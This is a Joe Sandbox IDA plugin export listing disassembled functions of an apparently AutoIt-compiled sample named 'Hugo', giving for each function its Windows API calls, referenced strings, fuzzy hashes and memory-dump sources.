Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 44cbf437ef94ad3e701f2919b3d5c095ec3aecc2863459b7205f7cece2f3bbf9
Instruction ID: 95f217a88cdeaa97eaa6e4a7056d364b7fcdafb0225c6d4efb4123b7f05d7dcb
Opcode Fuzzy Hash: 44cbf437ef94ad3e701f2919b3d5c095ec3aecc2863459b7205f7cece2f3bbf9
Instruction Fuzzy Hash: CD512131904256DFCB25DF28D441AFA7BA0EF15360F68415AE8919B290DF389D83EB61

Function 00F2F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00F2F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00F2F6F4

Strings

@, xrefs: 00F2F6E8

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cf2c90e3e81b98992aa43bec4bbe470c8540d55837f0bd390d3c3c4ea68aae65
Instruction ID: a9858dfbde26a9c124cb7c84186034730995bb0e3e0f94a0bdc33816a7b9b176
Opcode Fuzzy Hash: cf2c90e3e81b98992aa43bec4bbe470c8540d55837f0bd390d3c3c4ea68aae65
Instruction Fuzzy Hash: 69514771518748ABD320AF14DC86BABBBF8FF84340F81885EF1D9421A1DF348569DB66

Function 00F961A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00F9623D
_wcslen.LIBCMT ref: 00F96249

Strings

CALLARGARRAY, xrefs: 00F96243, 00F96248

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 04cb6f8930cd2537536c52e148e3d47211fdebf00f98e89edcb8cb1933b8c3ea
Instruction ID: 3e02d65079346d685296f175a9e64cf2791cf637d60b4517c52e83d17353ceef
Opcode Fuzzy Hash: 04cb6f8930cd2537536c52e148e3d47211fdebf00f98e89edcb8cb1933b8c3ea
Instruction Fuzzy Hash: D541AE71E002199FDF04EFA8C8919EEBBB5FF59364F104129E406EB251E7749D81EBA0

Function 00F8DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F8DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F8DB7F

Strings

|, xrefs: 00F8DB50

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 7cdd7ee6f66f452993196c25b0b6473f5295f36af25db9d1e1d53b130af1024d
Instruction ID: c680a0cce675389f9f8562c386ab7e0e7b64d83a34029ed36dfdc3a81a40b691
Opcode Fuzzy Hash: 7cdd7ee6f66f452993196c25b0b6473f5295f36af25db9d1e1d53b130af1024d
Instruction Fuzzy Hash: 2B316F72C01109ABCF05EFA4CD85EEE7FB9FF15354F100025F815A6162EB759946EB50

Function 00FA4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00FA40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FA40F8

Strings

static, xrefs: 00FA4058

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 044e041e22652550607aef83beab1b79e27150c1b2da648ce60726992c23fdba
Instruction ID: 6383a914c7ed68f28337e34541a0da0c705236e66abcd791f3a0e2a7e018ea46
Opcode Fuzzy Hash: 044e041e22652550607aef83beab1b79e27150c1b2da648ce60726992c23fdba
Instruction Fuzzy Hash: D531A1B1510604AADB14DF78CC80FFB77A9FF89760F008619F995C7190DA75AC81EB60

Function 00FA4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00FA50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA50D2

Strings

', xrefs: 00FA502C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f97d639ddb757cc5ae2bfd69eadba987e37d20affd12a5a52cbe49c9ae43298b
Instruction ID: 939b18a0cab4098c3d5fb5ed5f0c49580172cdfcba713a18fed91aef8b9ab9e7
Opcode Fuzzy Hash: f97d639ddb757cc5ae2bfd69eadba987e37d20affd12a5a52cbe49c9ae43298b
Instruction Fuzzy Hash: 71314CB5A0070AAFDB14CFA5C880BDE7BB5FF4A710F108069E904AB391D771A945DF90

Function 00FA41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00F17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F178B1
Part of subcall function 00F17873: GetStockObject.GDI32(00000011), ref: 00F178C5
Part of subcall function 00F17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F178CF

GetWindowRect.USER32(00000000,?), ref: 00FA4216
GetSysColor.USER32(00000012), ref: 00FA4230

Strings

static, xrefs: 00FA41F3

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 6cd5746416a11b26111a991d736bd9429f4e913ff3e7ec85ec6ccd8b144a9e28
Instruction ID: 308d94715b9bdfddd018b07f3df414468bb0b6b5e039333b20ffb6027c9c4e2d
Opcode Fuzzy Hash: 6cd5746416a11b26111a991d736bd9429f4e913ff3e7ec85ec6ccd8b144a9e28
Instruction Fuzzy Hash: 311137B2A10209AFDB00DFA8CC45AFA7BF8EF49364F014514FD56E3250E674E851EB60

Function 00F8D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F8D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F8D7EB

Strings

<local>, xrefs: 00F8D7AB

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 4d6b8216d127fd9921d0a95c692332c7ec6570cf5c843cced156845cb0652f13
Instruction ID: c91be9aff1bc606a357e37eb80fc10741462e7f9dc44af7258a4fa494b28374e
Opcode Fuzzy Hash: 4d6b8216d127fd9921d0a95c692332c7ec6570cf5c843cced156845cb0652f13
Instruction Fuzzy Hash: 6811C272605236BAD7385B668C49FEBBF9DEF127B8F10422AB509921C0D6649840E7F0

Function 00F775ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

CharUpperBuffW.USER32(?,?,?), ref: 00F7761D
_wcslen.LIBCMT ref: 00F77629

Strings

STOP, xrefs: 00F77623, 00F77628

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: bfa13349b5eb914bda87431d7669d225388daa248427c84cba08f6592858771d
Instruction ID: 8d9ee71dbcbab407bfbe619a9a2f368840be361853b5578538752a7ae0901d35
Opcode Fuzzy Hash: bfa13349b5eb914bda87431d7669d225388daa248427c84cba08f6592858771d
Instruction Fuzzy Hash: B3010832A24B278BCB10BFBCCC509BF33B5AB503607004526E429D2299EB34D840F691

Function 00F7262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F72699

Strings

ComboBox, xrefs: 00F72638
ListBox, xrefs: 00F72663

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 7c0b4dafb3c0bf9feed7a91eb9f69e980656deb4ae801a58fc87bfde5c60fb7a
Instruction ID: 33d83d280b1608b27b7c970652bbbb47c411d18b99b16f34cae2bea97f04770a
Opcode Fuzzy Hash: 7c0b4dafb3c0bf9feed7a91eb9f69e980656deb4ae801a58fc87bfde5c60fb7a
Instruction Fuzzy Hash: E101B175A00215ABCB08ABA4CC51DFE7779EF86360B04461BA836973C1DB359809A652

Function 00F72525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00F72593

Strings

ComboBox, xrefs: 00F72532
ListBox, xrefs: 00F7255D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 42f4d156f404ed9091675d15dd679ffb0ae5d12c31e43857bd477c70c1200f86
Instruction ID: ce2e53dcaec3d76be3e4c30ef39f511b8a8706f9b9e4ce40ce7fcd53269e93ab
Opcode Fuzzy Hash: 42f4d156f404ed9091675d15dd679ffb0ae5d12c31e43857bd477c70c1200f86
Instruction Fuzzy Hash: 3901A776A40105ABCB04E790CD62EFE77A9DF45340F58401B7816A32C1DF14DE08B6B3

Function 00F725A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00F72615

Strings

ComboBox, xrefs: 00F725B6
ListBox, xrefs: 00F725E1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: edfce46c4aa70d08283ba1dd77da327c3ab9ab2d4c069bca6122c6e3966c8ca0
Instruction ID: dbac2e48aae0e3a23d62f5b7e9d2eb5336ff2c4f21a8e7662ccd5c7d13aea12d
Opcode Fuzzy Hash: edfce46c4aa70d08283ba1dd77da327c3ab9ab2d4c069bca6122c6e3966c8ca0
Instruction Fuzzy Hash: 8B01D676E40105A7CB15E7A0DD12EFF77A89F05340F54402BB816A3281DB65DE09F6B3

Function 00F726B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F72720

Strings

ComboBox, xrefs: 00F726C2
ListBox, xrefs: 00F726ED

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 98546ea99934f136cebf2f8cd589a2119b5f969c5f52de1530fc6028b7797cc1
Instruction ID: 6f6162f35ebf68a07656ad2c2bdcb9f6c7f7fbfce614ef53282be0304d59dd50
Opcode Fuzzy Hash: 98546ea99934f136cebf2f8cd589a2119b5f969c5f52de1530fc6028b7797cc1
Instruction Fuzzy Hash: 3AF0F475A40214A6CB08A3A49C52FFE73B8AF05390F44091BB432A32C1DB649809A262

Function 00F71461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F7146F

Strings

AutoIt, xrefs: 00F71463
Error allocating memory., xrefs: 00F71468

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: be6e44935227e0cb2a5511b94b4c40a8c0f235d59dfa82930c3a936e9ed781d5
Instruction ID: 303686ac52881609c889b1b01054be95d7194a321e5983ac084e4e9a15d156c5
Opcode Fuzzy Hash: be6e44935227e0cb2a5511b94b4c40a8c0f235d59dfa82930c3a936e9ed781d5
Instruction Fuzzy Hash: 5CE0487134471836D2143794AC03F8576859F0AB71F25441BF789959C38EE66490769A

Function 00F310B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00F2FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F310E2,?,?,?,00F1100A), ref: 00F2FAD9

IsDebuggerPresent.KERNEL32(?,?,?,00F1100A), ref: 00F310E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F1100A), ref: 00F310F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F310F0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 69372a70860f84003ebb618d6067b0a25b9bd1ac4e71d18acd756dae9aa73900
Instruction ID: 1c31ce909a3b1fed8135ed04b0dd341aa3f55d061317e2b09b42bc46e68fcfd1
Opcode Fuzzy Hash: 69372a70860f84003ebb618d6067b0a25b9bd1ac4e71d18acd756dae9aa73900
Instruction Fuzzy Hash: 3EE06DB06003518BD320AF25E905382BBE8BF04350F00892DE886C2651EBB8E484EF91

Function 00F839D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F839F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F83A05

Strings

aut, xrefs: 00F839F9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 2faf912dd8bb8b72cacecd867aed8c5134e28bbc8037c086c0ded0f8058a21e5
Instruction ID: 287ebd446defd11da090a355cadd46732658823fb40d5c9fb9dbf461de58ca3b
Opcode Fuzzy Hash: 2faf912dd8bb8b72cacecd867aed8c5134e28bbc8037c086c0ded0f8058a21e5
Instruction Fuzzy Hash: A7D05EF250032867DA20A7649C0EFCB7AACDB45710F0002A1BA66960A1EAB4DA85CB90

Function 00FA2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA2E08
PostMessageW.USER32(00000000), ref: 00FA2E0F

Part of subcall function 00F7F292: Sleep.KERNEL32 ref: 00F7F30A

Strings

Shell_TrayWnd, xrefs: 00FA2E01

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 238018a92d657debfe229faebbe7ae1a070a323bf0b05cf8409813e60482b080
Instruction ID: eb52afb6d3b61127f3d4f9bf9888e5c9468f742255779a62b07cd0ee3058615a
Opcode Fuzzy Hash: 238018a92d657debfe229faebbe7ae1a070a323bf0b05cf8409813e60482b080
Instruction Fuzzy Hash: 6ED022353C13047BF328F330AC0FFC23B109B01B00F104822B30AAA2C0C8E0A800D684

Function 00FA2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FA2DDB

Part of subcall function 00F7F292: Sleep.KERNEL32 ref: 00F7F30A

Strings

Shell_TrayWnd, xrefs: 00FA2DC1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 14f730140ee241ec9f9363cabe7fc0cdd22a7cef193be11d2944437089205ec5
Instruction ID: 54f3890a82d6101bdd4af77b05a53fb516ff977c34c6e0a15d39d9ca345ac330
Opcode Fuzzy Hash: 14f730140ee241ec9f9363cabe7fc0cdd22a7cef193be11d2944437089205ec5
Instruction Fuzzy Hash: 59D02239384304BBE328F330AC0FFD23B109F00B00F104822B30AAA2C0C8E0A800D680

Function 00F4C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F4C213
GetLastError.KERNEL32 ref: 00F4C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F4C27C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
